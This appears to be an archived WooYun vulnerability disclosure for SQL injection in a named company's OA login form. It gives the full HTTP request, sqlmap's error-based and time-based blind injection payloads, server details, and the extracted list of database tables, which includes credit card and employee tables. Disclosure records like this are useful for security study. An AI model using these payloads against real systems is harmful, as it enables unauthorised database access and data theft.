WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
2016-01-18: Details reported to the vendor; awaiting vendor handling
2016-01-23: The vendor chose to ignore the vulnerability; details disclosed to the public
POST /index.php/Home/Index/ HTTP/1.1
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://work.locojoy.com
Cookie: PHPSESSID=ke5ruinsoeh0knj1dkjds2ukb4
Host: work.locojoy.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

act=login&password=g00dPa%24%24w0rD&username=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=login&password=g00dPa$$w0rD&username=1') AND (SELECT 8346 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (ELT(8346=8346,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lXho'='lXho

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=login&password=g00dPa$$w0rD&username=1') AND (SELECT * FROM (SELECT(SLEEP(5)))Kayt) AND ('aUos'='aUos
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
Database: locojoy_oa
[65 tables]
+----------------------------+
| lj_activity                |
| lj_chengshi                |
| lj_city                    |
| lj_company                 |
| lj_config_christmas        |
| lj_creditcard_list         |
| lj_depart_group            |
| lj_department              |
| lj_dkp_data                |
| lj_dkp_list                |
| lj_employee                |
| lj_file_doc                |
| lj_file_table              |
| lj_file_table_type         |
| lj_food_menu               |
| lj_group                   |
| lj_holiday                 |
| lj_kpi_data                |
| lj_kpi_depart              |
| lj_kpi_list                |
| lj_kpi_option              |
| lj_logs                    |
| lj_lottery                 |
| lj_mobile                  |
| lj_module                  |
| lj_notice                  |
| lj_province                |
| lj_score_week              |
| lj_share1                  |
| lj_share2                  |
| lj_share3                  |
| lj_system_event            |
| lj_user                    |
| lj_user_christmas          |
| lj_user_clock              |
| lj_user_creditcard         |
| lj_user_food               |
| lj_user_gamecoins          |
| lj_user_holiday            |
| lj_user_holiday_data       |
| lj_user_holiday_no1year    |
| lj_user_kpi                |
| lj_user_log                |
| lj_user_lottery            |
| lj_user_lottery_outer      |
| lj_user_massageticket      |
| lj_user_memo               |
| lj_user_message            |
| lj_user_message1           |
| lj_user_project_data       |
| lj_user_project_list       |
| lj_user_project_node       |
| lj_user_projectreport_data |
| lj_user_projectreport_list |
| lj_user_score              |
| lj_user_score_level        |
| lj_user_score_sp           |
| lj_user_score_txt          |
| lj_vote_data               |
| lj_vote_list               |
| lj_vote_xing               |
| lj_wifi                    |
| lj_worklog                 |
| lj_worklog_inner           |
| lj_worklog_pl              |
+----------------------------+
Severity: no impact (ignored by vendor)
Ignored at: 2016-01-23 13:10
Vulnerability Rank: 15 (rated by WooYun)
None yet